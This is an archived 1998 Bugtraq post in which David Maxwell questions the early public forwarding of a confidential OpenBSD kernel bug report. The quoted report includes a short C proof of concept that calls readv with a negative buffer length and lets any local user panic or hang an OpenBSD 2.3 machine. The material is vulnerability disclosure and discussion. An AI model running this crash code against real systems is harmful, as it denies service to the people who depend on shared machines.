[7394] in bugtraq


Re: Fwd: Any user can panic OpenBSD machine

daemon@ATHENA.MIT.EDU (David Maxwell)
Mon Jul 27 16:58:53 1998

Date: 	Mon, 27 Jul 1998 16:00:49 -0300
Reply-To: David Maxwell <david@WWW.FUNDY.CA>
From: David Maxwell <david@WWW.FUNDY.CA>
X-To:         Michael Fuhr <mfuhr@DIMENSIONAL.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <19980727112359.18461@dimensional.com>; from Michael Fuhr on Mon,
              Jul 27, 1998 at 11:23:59AM -0600

Since this bug is explicitly marked confidential, and was only opened today,
would it not have been reasonable to delay forwarding this? Given that the
OpenBSD people are particularly enthusiastic about security auditing, I expect
it will be fixed quickly.

                                                        David Maxwell

 On Mon, Jul 27, 1998 at 11:23:59AM -0600, Michael Fuhr wrote:
> -----Forwarded message from jon@oaktree.co.uk-----
>
> Message-Id: <199807271126.MAA16724@chalk.oaktree.net.uk>
> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST)
> From: jon@oaktree.co.uk
> To: gnats@openbsd.org
> X-Send-Pr-Version: 3.97
> Subject: kernel/549: Any user can panic OpenBSD machine
> Sender: owner-bugs@openbsd.org
>
>
> >Number:         549
> >Category:       kernel
> >Synopsis:       readv with -ve block size panics kernel
> >Confidential:   yes
> >Severity:       critical
> >Priority:       high
> >Responsible:    bugs
> >State:          open
> >Class:          sw-bug
> >Submitter-Id:   net
> >Arrival-Date:   Mon Jul 27 05:40:02 MDT 1998
> >Last-Modified:
> >Originator:     Jon Ribbens
> >Organization:
> \/ Jon Ribbens / jon@oaktree.co.uk
> >Release:        2.3
> >Environment:
>
>         System      : OpenBSD 2.3
>         Architecture: OpenBSD.i386
>         Machine     : i386
> >Description:
>         readv with one of the blocks having a -ve size panics the kernel.
>         Oops.
>
> >How-To-Repeat:
>
> #include <sys/types.h>
> #include <sys/uio.h>
> #include <unistd.h>
>
> int main(void) {
>   struct iovec iov[1];
>   char buffer[1024];
>
>   iov[0].iov_base = buffer;
>   iov[0].iov_len = -1;
>
>   return readv(0, iov, 1);
> }
>
>         run the above program, type a few characters, press return, observe
>         either kernel panic or machine hang. panic message is
>         "panic: ureadc: non-positive resid". Any user can do this.
>
>
> >Fix:
>         Dunno I'm afraid.
>
>
> >Audit-Trail:
> >Unformatted:
>
> -----End of forwarded message-----
>
> --
> Michael Fuhr
> http://www.fuhr.net/~mfuhr/
